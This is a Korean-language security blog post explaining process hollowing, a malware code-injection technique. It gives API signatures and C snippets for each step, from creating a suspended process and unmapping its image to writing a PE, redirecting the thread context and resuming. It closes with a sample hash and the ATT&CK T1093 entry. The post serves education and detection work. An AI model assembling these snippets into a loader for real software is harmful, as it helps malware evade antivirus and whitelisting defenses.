Monthly Jack2

[악성행위 기법] Code Injection - Process Hollowing

Published by Jack2 on February 9th, 2018

0) 개요
Hollow 란?
  • 구멍
  • 오목한 것
  • 텅빈
  • 오목한

간단 설명 [1]
  • Process Hollowing 기법은 최근 악성코드에서 사용되는 흔한 기술로
  • 정상적인 프로세스를 생성하고 해당 프로세스에 악성PE 데이터를 삽입하여 실행
    • SUSPEND 모드로 정상적인 프로세스를 생성
  • PROCESS REPLACEMENT
  • RUNPE

동작 방식
[2]
  • CreateProcess / OpenProcess
    • Suspend
  • WriteProcessMemory
  • ResumeThread


1) 프로세스 생성 - CreateProcess (feat.SUSPENDED)
CreateProcess function [3]
BOOL WINAPI CreateProcess(
_In_opt_ LPCTSTR lpApplicationName,
_Inout_opt_ LPTSTR lpCommandLine,
_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ BOOL bInheritHandles,
_In_ DWORD dwCreationFlags,
_In_opt_ LPVOID lpEnvironment,
_In_opt_ LPCTSTR lpCurrentDirectory,
_In_ LPSTARTUPINFO lpStartupInfo,
_Out_ LPPROCESS_INFORMATION lpProcessInformation
);
  • dwCreationFlags : 클래스 우선순위와 프로세스의 생성을 정하는 플래그

17개 Process Creation Flags 중 CREATE_SUSPENDED(0x00000004) [4]
  • 새로운 프로세스의 초기 스레드가 SUSPENDED 상태로 생성
  • ResumeThread 함수가 호출될 때 까지 실행을 안 함

BOOL WINAPI GetThreadContext(
_In_ HANDLE hThread,
_Inout_ LPCONTEXT lpContext
);
  • Thread의 Context를 2번째 파라미터로 이용

typedef struct _CONTEXT
{
ULONG ContextFlags;
ULONG Dr0;
ULONG Dr1;
ULONG Dr2;
ULONG Dr3;
ULONG Dr6;
ULONG Dr7;
FLOATING_SAVE_AREA FloatSave;
ULONG SegGs;
ULONG SegFs;
ULONG SegEs;
ULONG SegDs;
ULONG Edi;
ULONG Esi;
ULONG Ebx;
ULONG Edx;
ULONG Ecx;
ULONG Eax;
ULONG Ebp;
ULONG Eip;
ULONG SegCs;
ULONG EFlags;
ULONG Esp;
ULONG SegSs;
UCHAR ExtendedRegisters[512];
} CONTEXT, *PCONTEXT;




ex)
bool bResult = CreateProcessA( szFilePath,
NULL, NULL, NULL,
FALSE, CREATE_SUSPENDED,
NULL, NULL, &SI, &PI);
...

if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))

동작과정 #01
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext


2) 빈 곳 만들기 - Hollowing
SUSPENDED로 코드는 아직 실행되지 않은 상태, 이 때 호스트 프로세스에서 정상 코드를 메모리 상에 할당 해지(unmap) [5]
NTSTATUS ZwUnmapViewOfSection(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress
);
  • The ZwUnmapViewOfSection routine unmaps a view of a section from the virtual address space of a subject process.
  • Note If the call to this function occurs in user mode, you should use the name "NtUnmapViewOfSection" instead of "ZwUnmapViewOfSection".

ex)
if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
{
NewNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
NewNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
}

동작과정 #02
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext
  • NtUnmapViewOfSection


3) 메모리 할당 - VirtualAllocEx
새로운 코드를 쓰기 위해 VirtualAllocEx를 이용하여 메모리 할당[6]
LPVOID WINAPI VirtualAllocEx(
_In_ HANDLE hProcess,
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
  • 메모리 할당 시 flProtect 를 이용하여 할당된 페이지의 메모리 프로텍션 설정

ex)
pImageBase = VirtualAllocEx(PI.hProcess,
LPVOID(INH->OptionalHeader.ImageBase),
INH->OptionalHeader.SizeOfImage,
0x3000, PAGE_EXECUTE_READWRITE);


동작과정 #03
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext
  • NtUnmapViewOfSection
  • VirtualAllocEx



4) 만들어진 빈 곳에 악성코드 쓰기 - WriteProcessMemory
WriteProcessMemory를 이용하여 만들어진 빈 곳에 악성코드 쓰기 [7]
BOOL WINAPI WriteProcessMemory(
_In_ HANDLE hProcess,
_In_ LPVOID lpBaseAddress,
_In_ LPCVOID lpBuffer,
_In_ SIZE_T nSize,
_Out_ SIZE_T *lpNumberOfBytesWritten
);

ex)
if (pImageBase)
{
WriteProcessMemory( PI.hProcess,
pImageBase,
pFile,
INH->OptionalHeader.SizeOfHeaders,
NULL);


Image* 재배치 및 PEB* 의 베이스 주소 설정


for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
{
ISH =
PIMAGE_SECTION_HEADER(DWORD(pFile)+IDH->e_lfanew+248+(Count*40));

WriteProcessMemory( PI.hProcess,
LPVOID(DWORD(pImageBase) + ISH->VirtualAddress),
LPVOID(DWORD(pFile) + ISH->PointerToRawData),
ISH->SizeOfRawData, NULL);
}
WriteProcessMemory( PI.hProcess,
LPVOID(CTX->Ebx + 8),
LPVOID(&INH->OptionalHeader.ImageBase),
4, NULL);

/*Code Start Address_OEP*/
CTX->Eax = DWORD(pImageBase)+INH->OptionalHeader.AddressOfEntryPoint;




typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
BYTE Reserved4[104];
PVOID Reserved5[52];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved6[128];
PVOID Reserved7[1];
ULONG SessionId;
} PEB, *PPEB;


동작과정 #04
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext
  • NtUnmapViewOfSection
  • VirtualAllocEx
  • WriteProcessMemory
    • Relocate Image*
    • Set base address in PEB*


5) 새로운 코드섹션 가리키기 - SetThreadContext [8]
BOOL WINAPI SetThreadContext(
_In_ HANDLE hThread,
_In_ const CONTEXT *lpContext
);

SetThreadContext(PI.hThread, LPCONTEXT(CTX));


동작과정 #05
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext
  • NtUnmapViewOfSection
  • VirtualAllocEx
  • WriteProcessMemory
  • SetThreadContext



6) 실행 재개 - ResumeThread [9]
SUSPENDED 스레드의 실행을 재개하기 위해 ResumeThread 호출
DWORD WINAPI ResumeThread(
_In_ HANDLE hThread
);

ex)
ResumeThread(PI.hThread);


동작과정 #06
  • CreateProcessA - CREATE_SUSPENDED
  • GetThreadContext
  • NtUnmapViewOfSection
  • VirtualAllocEx
  • WriteProcessMemory
  • SetThreadContext
  • ResumeThread



7) 실제 악성코드 예 [10]




SHA2 : eae72d803bf67df22526f50fc7ab84d838efb2865c27aef1a61592b1c520d144

8) ATT&CK - T1093 [11]
  • Technique
    • ID : T1093
    • Tactic : Defense Evasion
    • Platform : Windows
    • Permissions Required : User
    • Data Sources : API monitoring, Process monitoring
    • Defense Bypassed : Process whitelisting, Anti-virus, Whitelisting by file name or path, Signature-based detection



[References]
  1. https://attack.mitre.org/wiki/Technique/T1093
  2. https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Matt_Recent%20Exploit%20Trend%20and%20Mitigation,%20Detection%20Tactics-Current.pdf
  3. https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx
  4. https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863(v=vs.85).aspx
  5. https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-zwunmapviewofsection
  6. https://msdn.microsoft.com/ko-kr/library/windows/desktop/aa366890(v=vs.85).aspx
  7. https://msdn.microsoft.com/ko-kr/library/windows/desktop/ms681674(v=vs.85).aspx
  8. https://msdn.microsoft.com/ko-kr/library/windows/desktop/ms680632(v=vs.85).aspx
  9. https://msdn.microsoft.com/ko-kr/library/windows/desktop/ms685086(v=vs.85).aspx
  10. https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
  11. https://attack.mitre.org/wiki/Technique/T1093
  12. https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

Copyright 2018. (JAEKI KIM) all rights reserved.
Copyright 2018. (JAEKI KIM) All pictures cannot be copied without permission.


JAEKI KIM Posted on February 9th, 2018

comments powered by Disqus